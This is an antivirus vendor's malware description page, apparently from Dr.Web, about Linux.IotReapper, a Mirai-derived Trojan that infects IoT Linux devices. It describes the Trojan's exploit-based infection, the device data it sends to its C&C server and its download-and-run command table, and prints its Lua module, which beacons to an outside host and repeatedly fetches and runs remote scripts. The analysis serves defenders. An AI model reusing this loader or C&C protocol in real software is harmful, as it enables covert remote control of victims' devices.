Si utilizza un browser obsoleto!
La pagina può visualizzarsi in modo non corretto.
L’analisi delle tecnologie utilizzate dai malfattori ci permette di trarre conclusioni su possibili vettori dello sviluppo del settore dei virus affinché possiamo affrontare le minacce future in modo ancora più efficace. Scoprite anche voi come funzionano in sistemi infetti determinati programmi malevoli e come affrontarli.
A Trojan that infects IoT Linux devices. It is a modified version of Linux.Mirai.
Instead of brute-forcing logins and passwords to hack devices, Linux.IotReapper launches exploits (at the present moment it uses 10 exploits) and checks the result of their execution. If a device is vulnerable, it uses the GET request to send to its command and control (C&C) server the following structure:
struct
{
char host[40];
char port[10];
char user[30];
char password[40];
char gw_name[30];
char device_id[30];
} DeviceInfo
where device_id — a unique identifier of the infected device.
Periodically, it sends to the C&C servers the following requests:
/rx/hx.php?mac=52-54-00-12-34-56&&port=3000&type=etag&ver=1.07&act=finish
where the values of the act parameter are exit code system call, or finish, if there is no launched files.
The Trojan obtains commands from the C&C server in the JSON format. It processes the following commands:
| key | value |
|---|---|
| state | 0 or 1 |
| code | run — download and run, down — only download |
| ip | source for downloading |
| name | name of the file saved to the /tmp/ folder |
| md5 | its md5 |
| port | http port |
| path | url to a file |
| runtype | |
| runport |
The Trojan downloads from the remote server a module of the Lua interpreter for the architectures ARM and MIPS. The module contains the following code in the Lua language:
local sock = require("socket")
local http = require("socket.http")
local ltn12 = require("ltn12")
local lua_url = "***http://***.com:8080/run.lua"
local tj_url = "http://bbk80.com/api/api.php"
local request_body = "macaddress=" .. DEVICE_MAC .. "&device=TP-Link775" .. "&type=armv5le&version=" .. VERSION
local if_modified_since = nil;
function http.get(u)
local t = {}
local headers = {
}
if if_modified_since ~= "" then
headers = {
["If-Modified-Since"] = if_modified_since
}
end
local r, c, h = http.request{
headers = headers,
url = u,
sink = ltn12.sink.table(t)
}
if c == 200 then
if_modified_since = h["date"]
end
return r, c, h, table.concat(t)
end
http.request(tj_url,request_body)
local r,code,header,body=http.get(lua_url)
while true do
if code == 200 then
attack(body)
print("Download Succeed")
elseif code == 304 then
--print("Download Not Modified")
else
print("Download Failed:" .. code)
end
sock.sleep(5 * 60)
r,code,header,body=http.get(lua_url)
http.request(tj_url,request_body)
collectgarbage("collect")
end
This module can currently download and launch a script that looks the following way:
print("Just Test")
The functions of the Trojan allow to receive links, download a file from them and launch it. However, attempts to obtain active links were unsuccessful during the research of the sample.
Secondo le statistiche ogni quinto programma per SO Android contiene una vulnerabilità (ovvero un "buco"), il che permette ai malfattori di introdurre con successo trojan mobili sui dispositivi e di eseguire le azioni richieste.
Auditor di sicurezza in Dr.Web per Android farà la diagnostica e l’analisi della sicurezza del dispositivo mobile, proporrà soluzioni per risolvere i problemi e le vulnerabilità rilevate.
